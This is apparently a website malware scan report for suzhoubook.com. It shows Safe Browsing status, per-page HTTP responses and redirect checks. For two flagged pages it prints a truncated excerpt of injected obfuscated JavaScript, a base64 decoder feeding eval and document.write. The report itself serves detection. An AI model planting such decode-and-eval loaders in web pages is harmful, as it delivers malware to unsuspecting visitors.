Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=suzhoubook.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.suzhoubook.com/ | 200 OK Content-Length: 94833 Content-Type: text/html | clean |
http://www.suzhoubook.com/../sdcx.asp | 403 Forbidden Content-Length: 32 Content-Type: text/html | clean |
http://www.suzhoubook.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.suzhoubook.com/index.asp | 200 OK Content-Length: 94833 Content-Type: text/html | clean |
http://www.suzhoubook.com/xwgj.asp | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.suzhoubook.com/rdtj.asp | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.suzhoubook.com/syxw.asp | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.suzhoubook.com/xssj.asp | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.suzhoubook.com/tstj.asp | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.suzhoubook.com/ydzx.asp | 200 OK Content-Length: 34805 Content-Type: text/html | clean |
http://www.suzhoubook.com/tsssmain.asp | 200 OK Content-Length: 27902 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var a1 = "ABCDEFG"; var a2 = "HIJKLMNOP"; var a3 = "QRSTUVWXYZabcdef"; var keyStrs = a1+a2+a3+"ghijklmnopqrstuv"+"wxyz0123456789+/"+"="; function mydata(input){ var output=""; var chr1,chr2,chr3=""; var enc1,enc2,enc3,enc4=""; var i=0; var base64test=/[^A-Za-z0-9\+\/\=]/g; input=input.replace(/[^A-Za-z0-9\+\/\=]/g,""); do{ enc1=keyStrs.indexOf(input.charAt(i++)); enc2=keyStrs.indexOf(input.charAt(i++)); enc3 t=eval("mydata(String.fromCharCode("+t+"))"); document.write(t); Antivirus reports:
| ||
http://www.suzhoubook.com/xhly2.asp | 200 OK Content-Length: 33372 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var a1 = "ABCDEFG"; var a2 = "HIJKLMNOP"; var a3 = "QRSTUVWXYZabcdef"; var keyStrs = a1+a2+a3+"ghijklmnopqrstuv"+"wxyz0123456789+/"+"="; function mydata(input){ var output=""; var chr1,chr2,chr3=""; var enc1,enc2,enc3,enc4=""; var i=0; var base64test=/[^A-Za-z0-9\+\/\=]/g; input=input.replace(/[^A-Za-z0-9\+\/\=]/g,""); do{ enc1=keyStrs.indexOf(input.charAt(i++)); enc2=keyStrs.indexOf(input.charAt(i++)); enc3 t=eval("mydata(String.fromCharCode("+t+"))"); document.write(t); Antivirus reports:
| ||
http://www.suzhoubook.com/bbs/index.asp | HTTP/1.1 302 Object moved Cache-Control: private Date: Fri, 26 Dec 2014 08:56:55 GMT Location: showerr.asp?action=stop Server: Microsoft-IIS/6.0 Content-Length: 144 Content-Type: text/html; Charset=GB2312 Set-Cookie: ASPSESSIONIDCSARQARA=FIPNKNGCEENMOLKNKBMCOABO; path=/ X-Powered-By: ASP.NET | clean |
http://www.suzhoubook.com/bbs/showerr.asp?action=stop | 200 OK Content-Length: 1735 Content-Type: text/html | clean |
http://www.suzhoubook.com/bbs/inc/dv_wnd.js | 200 OK Content-Length: 4011 Content-Type: application/x-javascript | clean |
http://www.suzhoubook.com/bbs/inc/main82.js | 200 OK Content-Length: 23074 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: suzhoubook.com
Result:
GET / HTTP/1.1
Host: suzhoubook.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: suzhoubook.com
Referer: http://www.google.com/search?q=suzhoubook.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: suzhoubook.com
Referer: http://www.google.com/search?q=suzhoubook.com
Result:
The result is similar to the first query. There are no suspicious redirects found.